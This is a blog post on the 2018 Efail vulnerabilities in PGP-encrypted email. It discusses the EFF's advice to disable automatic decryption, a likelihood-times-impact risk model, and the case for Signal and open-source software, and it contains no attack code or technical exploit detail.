Efail: The facts and fads

Maybe you have noticed it. Privacy is an issue. A bit strange since there are only 10 days left until the new EU General Data Protection Regulation (GDPR) will become fully enforceable throughout the European Union.

So before end of May 2018 all organizations that process data of EU citizens must comply with this General Data Protection Regulation. Determining how to design and improve your systems to meet the GDPR is not straightforward. Currently everyone who protected his email communications using PGP (Pretty Good Privacy) is fully awake again. The clear advice given by the Electronic Frontier Foundation is to immediately disable and/or uninstall tools that automatically decrypt PGP-encrypted email. So people who live in a country where the government is not so friendly towards people with different opinions are afraid.

The advice is a good advice: Take no more risks.

But what is missing from the initial EFF statement is the rationale behind this advice. So an online storm of criticism hit the EFF. The EFF based the advice on research by German security researchers. The full research on EFAIL can be hound here.

All security and privacy professionals know: A Risk Analysis must take into consideration the sensitivity of data processed and stored by systems, as well as the likelihood and impact of potential threat events. Based on the current PGP research many potential threats for PGP secure email can in essence be organized into three main categories.

  • Loss of Confidentiality: When you used PGP for your emails loss of confidentiality this possible.
  • Loss of Integrity: The content may be tampered with, so it is possible that your emails can no longer be trusted.
  • Loss of Availability: Not really applicable for the found threads. Advice is to stop using PGP mail now and chose an alternative.

The difficulty is that you need to be able to classify if the likelihood for a disaster to happen with your PGP email is: unlikely, possible, likely of very likely. This is dependent of the specific context (your context) and that is why general security and privacy advises often discussed. The EFF advice is a save advice for almost all use cases since now that it is clear and proved that PGP is vulnerable the impact for many peoples lives is just severe. In the end risks impacts are not technical but are always an impact for businesses, or for peoples safety or privacy.

Risk levels can be calculated as the product of the LIKELIHOOD and IMPACT of a potential threat event / threat event category. See the matrix below.


Risk model

The only thing that really should be discussed for the EFF Efail advice is the advice to use Signal for secure communications now. Signal is distributed using GPLv3 for client software and AGPLv3 for their servers.  So almost as open as possible. There is only one thing that keeps hurting Signal for real paranoid users: The Signal software is created with the use of a proprietary dependencies on Google libraries.

Since Signal is used by many people world wide good audits have been performed and public audit reports exist. And the Signal software is a good object for security researchers to find vulnerabilities. The more people can check the quality of software the better is will become. This is the power of using OSS for security and privacy products. Closed commercial software is often based on the principle ‘security by obscurity’ where history has learned that trust for this software is too often ashamed.

Signal is just as other OSS software full transparent when it comes to privacy and security aspects. OSS software is well positioned to ensure privacy when it comes to your digital footprints. Free Software is probably the only way to ensure that.

This blog post will be added (after rewrite) as an extension on the ‘Open Reference Architecture for Security and Privacy‘. We are working on an renewed version. Please join us!